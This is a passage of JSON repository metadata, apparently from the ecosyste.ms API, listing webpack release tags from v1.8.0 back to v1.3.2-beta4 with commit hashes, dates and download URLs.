e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2